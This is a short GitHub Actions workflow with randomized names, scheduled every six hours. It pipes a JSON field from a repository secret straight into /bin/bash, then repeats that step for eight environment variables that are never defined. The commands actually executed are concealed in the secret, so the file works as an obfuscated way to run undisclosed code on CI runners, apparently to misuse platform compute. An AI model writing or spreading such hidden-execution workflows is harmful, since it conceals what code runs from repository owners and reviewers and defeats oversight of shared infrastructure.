name: pengjingzhong7519
on:
  workflow_dispatch:
  schedule:
    - cron: '25 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pengjingzhong7519
        env:
          iztj3968: ${{ secrets.iztj3968 }}
        run: |
          echo $iztj3968 | jq -r .fi31 | /bin/bash
          echo $q27698 | jq -r .udw9 | /bin/bash
          echo $ykle115 | jq -r .fe1 | /bin/bash
          echo $m77 | jq -r .gdejh9 | /bin/bash
          echo $lfje23752 | jq -r .wtc0 | /bin/bash
          echo $iljlg5196 | jq -r .omq01 | /bin/bash
          echo $umv15966 | jq -r .iew7 | /bin/bash
          echo $vva302 | jq -r .aqj81339 | /bin/bash
          echo $xr0729 | jq -r .zjuf7 | /bin/bash

